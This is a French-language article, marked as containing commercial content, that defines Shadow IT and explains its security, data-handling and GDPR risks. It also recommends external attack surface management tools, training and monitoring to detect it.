Dans cet article, nous allons évoquer un phénomène courant dans la majorité des organisations et qui représente un risque réel pouvant exposer une entreprise à une cyberattaque : le Shadow IT.
Nous commencerons par définir ce qu'est le Shadow IT, avant d'évoquer les risques associés pour une organisation. Puis, la dernière partie de l'article s'intéressera à l'analyse de la surface d'attaque externe d'une organisation pour démontrer son importance vis-à-vis du Shadow IT.
II. Qu'est-ce que le Shadow IT ?
Le Shadow IT appelé aussi Rogue IT, que l'on peut traduire en français par "Informatique fantôme" ou "Informatique parallèle", est un terme faisant référence à l'utilisation de logiciels et applications dans le dos du service informatique. Autrement dit, le service informatique n'est pas au courant que certains utilisateurs font usage de tel service ou telle application. Cela signifie que les processus de validation et d'implémentation ont été esquivés, volontairement ou non, par les utilisateurs.
Le Shadow IT fait également référence aux systèmes oubliés ou non référencés : il peut s'agir d'un PoC mené par le service informatique en lui-même, sous la forme d'un environnement de tests. Celui-ci peut rester actif bien au-delà de la phase d'expérimentation et s'il n'est pas correctement isolé de la production, ou pire encore, s'il est exposé sur Internet, peut représenter un risque.
En réalité, le Shadow IT est devenu un phénomène courant en raison de la prolifération des applications et services, dont certains sont très faciles à utiliser et à appréhender pour les utilisateurs. Les services Cloud, proposé en tant que solution SaaS, sont un bon exemple, pour ne pas dire le meilleur exemple.
Cependant, le Shadow IT est associé à un ensemble de risques, notamment en matière de sécurité, de conformité et de gestion de l'information. C'est ce que nous allons évoquer dans la prochaine partie de l'article.
III. Les risques associés au Shadow IT
La sécurité
Par définition, les applications déployées sans l'approbation du service informatique ne respecteront pas les normes de sécurité de l'entreprise. Autrement dit, ils ne seront pas correctement configurés, ni même sécurisés, et potentiellement, les données ne seront pas sauvegardées. Au fil du temps, si ces applications ne sont pas suivies, elles peuvent être vulnérables à une ou plusieurs failles de sécurité que les cybercriminels peuvent exploiter. Ceci est d'autant plus vrai et critique s'il s'agit d'un système exposé sur Internet.
Les données
Au-delà des risques relatifs à l'absence de contrôle de sécurité (configuration, suivi des mises à jour, etc.), le Shadow IT représente un réel risque pour la gestion des données de l'organisation. En effet, les données peuvent être stockées dans des endroits non sécurisés : absence d'authentification (dépôt public), connexion non chiffrée, mauvaise gestion des permissions, etc. Par ailleurs, l'entreprise peut perdre le contrôle des données concernées et ne plus savoir où elles se situent. Tôt ou tard, ceci peut engendrer une fuite de données si un tiers non autorisé parvient à accéder à ces données.
La conformité et le RGPD
Il existe également un lien étroit entre la notion de conformité et le Shadow IT, notamment vis-à-vis du RGPD. Pour rappel, le RGPD (Règlement Général sur la Protection des Données) est une législation de l'Union européenne qui vise à protéger les données personnelles des citoyens de l'UE. Il exige un suivi strict et précis des données personnelles traitées par les entreprises.
Cela signifie que l'organisation doit avoir connaissance de l'endroit où les données sont stockées et qui y a accès. Des principes contraires à la problématique du Shadow IT puisque les données peuvent être stockées sur des systèmes non approuvés ou peut-être même non conforme au RGPD. En cas de violation de données, l'entreprise peut être tenue responsable et être sanctionnée par une amende. L'aspect conformité peut également être associé à la gestion des licences et aux conditions d'utilisation d'un service ou d'une application.
En résumé
En résumé, avec le Shadow IT, il n'y a pas que des dommages techniques et cela peut être beaucoup préjudiciable pour l'entreprise. Le Shadow IT peut être à l'origine d'un problème de sécurité (intrusion, fuite de données, etc.) pouvant engendrer une indisponibilité de tout ou partie de l'infrastructure de l'entreprise. Dans ce cas, il y aura un impact financier pour l'organisation et son image de marque sera également entachée.
IV. L'analyse de la surface d'attaque externe
Compte tenu des risques représentés par le Shadow IT, il est crucial pour les entreprises de prendre les dispositions nécessaires pour protéger leurs données. Au-delà de mettre en place des procédures strictes, une organisation peut adopter un outil d'analyse de la surface d'attaque externe (EASM) afin d'obtenir une cartographie précise des assets exposés sur Internet. Ils représentent un risque important et peuvent être utilisés comme vecteur d'attaque initial, au même titre que les e-mails de phishing.
Nous pouvons voir plusieurs avantages à l'utilisation de l'EASM pour lutter contre le Shadow IT :
- Identifications des actifs (assets) non autorisés : l'analyse effectuée par l'outil EASM peut identifier tous les actifs associés à une organisation, qu'ils soient autorisés ou non. Autrement dit, cette analyse sera utile pour découvrir de façon proactive les systèmes, applications et services utilisés sans l'approbation de la direction informatique.
- Suivi continu : le processus de découverte régulier de la solution d'EASM assure une surveillance continue. C'est important pour réduire au maximum le délai entre le moment où l'actif est mis en ligne et le moment où il est détecté. Ainsi, l'organisation, par l'intermédiaire de son équipe technique, peut réagir rapidement pour minimiser les risques.
- Évaluation des risques : chaque actif identifié sera passé en revue et évalué pour déterminer les risques potentiels qui lui sont associés. Ceci permettra d'identifier ses faiblesses, notamment les problèmes de configuration, les vulnérabilités, etc... Comme le ferait un pentester.
En identifiant les vulnérabilités et les risques associés à chaque système et service exposé, l'outil EASM vous aidera à prendre les mesures nécessaires et les bonnes décisions. Dans le cas du Shadow IT, cela peut induire la désactivation du système non autorisé ou la conservation du système sous réserve que sa configuration soit révisée (hardening du système, par exemple).
En plus de l'analyse de la surface d'attaque externe, les organisations peuvent traquer le Shadow IT grâce à :
La formation des employés pour les informer des risques associés au Shadow IT, mais aussi, pour leur expliquer les processus de validation internes de l'entreprise. Par exemple, la procédure à respecter pour demander l'accès à une application ou un service. Ceci est valable aussi pour le service informatique en lui-même : aucun passe-droit et ils doivent veiller à la bonne application de ces processus.
La gestion des appareils et des autorisations : les outils de gestion des appareils et des applications mobiles peuvent aider à déployer des applications, mais aussi, des politiques pour accorder et refuser certaines actions. Cela peut aussi permettre de contrôler quels appareils et applications ont accès aux données de l'organisation.
La surveillance et audit du réseau et des systèmes pour détecter les flux et les événements inhabituels.
Le dialogue entre le service informatique et les salariés, ainsi que les responsables de service, joue un rôle important, au-delà des solutions techniques. L'origine du Shadow IT peut être lié à un contentieux entre un salarié et le service informatique.
V. Conclusion
Le Shadow IT doit être pris au sérieux. Ne fermez pas les yeux sur cette informatique déjà dans l'ombre par définition. Cherchez plutôt à mettre en lumière les services, les applications et les systèmes utilisés sans l'approbation de l'équipe IT afin de prendre les bonnes décisions. La formation, la sensibilisation et l'écoute pourront aussi permettre de limiter la tentation des utilisateurs.
Cet article contient une communication commerciale.
Connexion
